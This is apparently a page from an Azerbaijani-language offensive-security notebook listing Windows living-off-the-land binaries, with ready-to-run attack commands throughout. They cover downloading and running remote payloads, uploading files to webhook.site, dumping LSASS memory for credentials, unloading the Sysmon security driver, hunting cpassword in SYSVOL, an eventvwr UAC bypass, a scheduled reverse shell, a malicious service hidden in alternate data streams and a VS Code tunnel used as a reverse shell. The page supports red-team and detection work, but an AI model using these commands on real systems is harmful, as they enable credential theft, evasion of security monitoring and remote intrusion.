Apps and Commands
Execute
AddinUtil 'Addins.Store' faydalı yükünün mövcud olduğu kataloqdan icra edilir, AddinUtil 'Addins.Store' faydalı yükünü yerinə yetirəcək.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe -AddinRoot:.
Download
AppInstaller.exe URI üçün standart işləyici tərəfindən yaradılıb, o, paketi URL-dən yükləməyə/quraşdırmağa cəhd edir.
start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
AWL Bypass
Quraşdırma Provayderi və lazımi qovluq strukturu ilə C# kodunu yerinə yetirin.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
Execute
Hər gün müəyyən bir vaxtda yerinə yetirmək üçün təkrarlanan tapşırıq yaradın.
C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
Execute
Qeydiyyatdan keçmiş Assistive Technology (AT) işə salın.
ATBroker.exe /start malware
bash.exe-dən calc.exe-ni icra edir
bash.exe -c calc.exe
Alternate data streams
bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
Execute
certoc.exe -LoadDLL "C:\test\calc.dll"
Download
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
Download,Encode,Decode
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
certutil -encode inputFileName encodedOutputFileName
certutil -decode encodedInputFileName decodedOutputFileName
Download,Upload
Müəyyən edilmiş faylı WebDAV serverindən hədəf fayla yükləyir.Müəyyən edilmiş faylı WebDAV serverinə yükləyir.
type \\webdav-server\folder\file.ext > C:\Path\file.ext
type C:\Path\file.ext > \\webdav-server\folder\file.ext
Credentials
cmdkey /list
Execute
cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
Copy
colorcpl file.txt
Upload,Download
ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
ConfigSecurityPolicy.exe https://example.com/payload
Execute
conhost.exe calc.exe
Compile
File.cs-də saxlanılan C# kodunu tərtib etmək və tərtib edilmiş versiyanı My.exe-yə çıxarmaq üçün CSC.EXE-dən istifadə edin.
csc.exe -out:My.exe File.cs
csc -target:library File.cs
DeviceCredentialDeployment.exe
Conceal
DeviceCredentialDeployment
Dump,Execute
Hazırlanmış disk kölgəsi skriptindən diskshadow.exe istifadə edərək əmrləri yerinə yetirin.
diskshadow.exe /s c:\test\diskshadow.txt
diskshadow> exec calc.exe
UAC Bypass
Başlanğıc zamanı eventvwr.exe, eventvwr.msc saxlanan konsol faylını açmaq üçün istifadə edilən mmc.exe-nin yeri üçün HKCU\Software\Classes\mscfile\shell\open\command reyestr dəyərini yoxlayır. Bu reyestr dəyərinə başqa ikili və ya skriptin yeri əlavə edilərsə, o, istifadəçiyə UAC sorğusu göstərilmədən yüksək bütövlükdə proses kimi icra olunacaq.
ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Credentials,Download
SYSVOL-da saxlanılan Qrup Siyasəti fayllarında saxlanılan parolu axtarın.
findstr /S /I cpassword \\sysvol\policies\*.xml
Tamper
Təhlükəsizlik agentləri tərəfindən istifadə edilən sürücünü yükdən çıxarır
fltMC.exe unload SysmonDrv
Execute
echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
Execute,AWL bypass
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Reconnaissance
GUI yaratmadan istifadəçi ekranını yazın. Siz qeydi dayandırmaq və çıxış faylı yaratmaq üçün "psr.exe /stop" istifadə etməlisiniz.
psr.exe /start /output D:\test.zip /sc 1 /gui 0
Execute
Pester.bat [/help|?|-?|/?] "$null; notepad"
Execute
pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
Download
8080 portunda yerli olaraq yerləşdirilən xidmət üçün yönləndirilmiş portun internetdə nümayiş etdirilməsinə icazə verilir.
devtunnel.exe host -p 8080
Execute,Download
wsl.exe -e /mnt/c/Windows/System32/calc.exe
Download
Downloads payload from remote server
winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Execute
VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here"
Awl Bypass
Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
Download, Execute
squirrel.exe --download [url to package]
squirrel.exe --update [url to package]
squirrel.exe --updateRollback=[url to package]
Execute
Modul və ScriptBlock Girişi olmadan SQL Server PowerShell mini konsolunu işə salın.
SQLToolsPS.exe -noprofile -command Start-Process calc.exe
Dump
sqldumper.exe 464 0 0x0110
Execute
Powershell-i remote.exe-nin uşaq prosesi kimi yaradır
Remote.exe /s "powershell.exe" anythinghere
Uzaq serverdən yükü endirir
ProtocolHandler.exe https://example.com/payload
Execte
OpenConsole.exe calc
Download
mspub.exe https://example.com/payload
Execute,AWL Bypass
msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
Execute
Mftrace.exe cmd.exe
Download
Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Dump
DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full
Dump
Creates a memory dump of the LSASS process.
dump64.exe <pid> out.dmp
Execute
dotnet.exe [PATH_TO_DLL]
MSI faylını C:\Windows\Installer-ə yükləyir və sonra quraşdırır.
devinit.exe run -t msi-install -i https://example.com/out.msi
Execute
csi.exe file
Dump
createdump.exe -n -f dump.dmp [PID]
Dump
rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
Execute
rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
Execute
rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
Websockets vasitəsilə global.rel.tunnels.api.visualstudio.com üzərindən əks PowerShell bağlantısını işə salır; əmr
code.exe tunnel --accept-server-license-terms --name "tunnel-name"
UAC Bypass
wsreset.exe
Alternate DATA Streams
wmic.exe process call create "c:\ads\file.txt:program.exe"
Execute
rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP"
Execute
ssh localhost calc.exe
sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
Execute
rundll32.exe AllTheThingsx64,EntryPoint
Last updated
Was this helpful?